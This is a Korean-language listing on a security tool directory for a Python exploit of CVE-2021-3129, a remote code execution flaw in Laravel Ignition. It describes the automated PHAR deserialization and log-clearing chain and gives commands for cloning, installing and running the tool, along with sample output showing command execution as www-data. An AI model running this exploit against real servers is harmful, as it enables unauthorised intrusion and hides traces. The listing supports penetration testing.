Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-3129 — # CVE-2021-3129용 Python 익스플로잇 취약한 Laravel Ignition 엔드포인트에서 임의 명령을 실행하기 위해 PHAR 역직렬화를 자동화하는 Python 익스플로잇입니다. | Kitploit
도구/GitHubGitHub/0x0d3ad/cve-2021-3129
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHub0x0d3ad/cve-2021-3129

CVE-2021-3129

# CVE-2021-3129용 Python 익스플로잇 취약한 Laravel Ignition 엔드포인트에서 임의 명령을 실행하기 위해 PHAR 역직렬화를 자동화하는 Python 익스플로잇입니다.

저장소 보기
1011년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-3129 Laravel Ignition RCE 익스플로잇

이것은 Laravel에 Ignition 패키지가 설치된 경우 발생하는 원격 코드 실행 취약점(CVE-2021-3129)을 위한 Python 익스플로잇 스크립트입니다. 이 취약점을 통해 공격자는 PHAR 역직렬화를 통해 임의의 시스템 명령을 실행할 수 있습니다.

기능

  • phpggc를 사용하여 PHAR 페이로드를 자동으로 생성
  • 실행할 명령어(예: id, whoami 등)를 사용자 입력으로 받음
  • 로그 지우기, 페이로드 주입, 로그를 PHAR로 변환, 역직렬화 트리거 등 전체 익스플로잇 과정을 자동화

사전 요구 사항

  • Python 3.x
  • requests 라이브러리
  • 시스템에 PHP 설치
  • phpggc 설치 (PHAR 페이로드 생성용)

설치

  1. 저장소를 클론합니다:

    root@kitploit:~
    git clone https://github.com/0x0d3ad/CVE-2021-3129.git
    cd CVE-2021-3129
    
  2. 필요한 Python 패키지를 설치합니다:

    root@kitploit:~
    pip install requests
    
  3. 원하는 대상과 명령어로 스크립트를 실행합니다:

    root@kitploit:~
    python3 CVE-2021-3129.py http://example.com --cmd 'id'
    

    예제 출력:

    root@kitploit:~
    [+] Generating PHAR payload for command: id
    [+] Trying to clear logs
    [+] Logs cleared
    [+] Convert log file to PHAR
    [+] Successfully converted logs to PHAR
    [+] PHAR deserialized
    ---------------------------------------
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    ---------------------------------------
    [+] Trying to clear logs
    [+] Logs cleared
    

인자

  • target (필수): 취약한 Laravel 애플리케이션의 URL
  • --cmd (선택): 대상에서 실행할 명령어 (기본값: whoami)
  • --log_path (선택): 사용할 로그 파일 경로 (기본값: ../storage/logs/laravel.log)

POC

POC

POC

도구 다운로드